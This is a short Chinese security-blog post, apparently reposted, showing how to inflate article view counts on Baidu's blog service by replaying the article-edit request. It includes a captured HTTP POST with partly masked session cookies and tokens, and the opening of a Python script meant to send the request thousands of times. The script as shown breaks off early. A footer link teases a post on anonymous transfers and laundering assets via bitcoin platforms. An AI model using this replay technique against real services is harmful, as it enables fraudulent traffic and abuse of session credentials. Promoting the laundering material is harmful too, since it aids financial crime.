By:BlAck.Eagle
早就发现这个地方有问题,可以导致恶意刷访问量。
在百度发表文章一篇,然后点击编辑,抓包,如下:
POST /test/commit HTTP/1.1 Host: hi.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: [b]Cookie: BAIDUID=D5CDD45C1EC5xxxx24F14C3141:FG=1; BDSP=e3f72afcca12495435fb37xxx00a4b0df5bd5195ccc533fa828ba61ea8d3fd1f4134970a304e251f95cad1c8a786c9177f3e6709c93d70cf3bc79f3df8dcd100baaxxx3cec3fdfc0396454b68; BDSTAT=8c856ca29021ecxxx9bb4dd5cbd02e83b01213fac0e7bec55e753ea; Hm_lpvt_4d16ad3b9xxxf64c3a01c5d=1302800577698; Hm_lvt_4d16ad3b9adade3b562e5f64c3a01c5d=1302800577698; _time_stamp_=3; BD_UTK_DVT=1; BDUSS=NHNXN-VW0yckJrUDdDVGdwa0xxxYzVOQVFBQUFBJCQAAAAAAAAAAAoakSfHV8gE08fT9LXEutrTpQAAAAAAAAAAAAAAAAAAAAAAAAAAAADgusV6AAAAAOC6xXoAAAAAcF1CAAAAAAAxMC4yxx3QKKdNeE; USERIDFO=0ebdddcae77ed638bxxx89608821cxxxb9debfe4b18[/b]Content-Type: application/x-www-form-urlencoded Content-Length: 322 [b]bdstoken=ac52121470a40exxd731a94685&ct=1&mms_flag=0&cm=2&spBlogID=0c695xxxxBlogCatName_o=%C4%AC%C8%CF%B7%D6%Cxxitle=fuxxxCp%3Efuzz+for+test%xxxE&spBlogCatName=%spBlogPower=0&spIsCmtAllow=1&spShareNotAllow=0&spVcode=&spVerifyKey=[/b] |
写了一个py的脚本测试了下,只做安全研究,后果不负。现学的python,很不规范。
# -*- coding: gb2312 -*- import urllib2,httplib,sys,re,time httplib.HTTPConnection.debuglevel = 1 def usage(): print "########################################################" print "Usage:n Fuzz 1000次 By:BlAck.Eagle" print "python fuzzbaidu.py 10000" print "baidu fuzz浏览人数" print "########################################################" print "" class SimpleCookieHandler(urllib2.BaseHandler): def http_request(self, req): # 任意发表一篇文章,然后选择编辑并抓包,将Cookie填写 simple_cookie = '你的cookie' if not req.has_header('Cookie'): req.add_unredirected_header('Cookie', simple_cookie) else: cookie = req.get_header('Cookie') req.add_unredirected_header('Cookie', simple_cookie + '; ' + cookie) return req argvs=sys.argv |
原理很简单,其实就是百度对于已注册的用户,修改文章的时候会默认增加浏览量。
文章来源于lcx.cc:百度文章修改 恶意提高浏览量的测试 百度文章刷访问量
相关推荐: 论匿名转帐和转移资产的可能,如何:网络匿迹、匿名洗钱、转移资产系统
匿名转帐和转移资产的可能 xsser (十根阳具有长短!!) | 2014-06-20 08:46 借助各个比特币平台实现一套转移资产的系统,如果设计好一些对冲机制应该可以做出一套安全匿名的转帐和交易系统啊 [原文地址] 各种吐槽: 1# J4rn4ben |…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论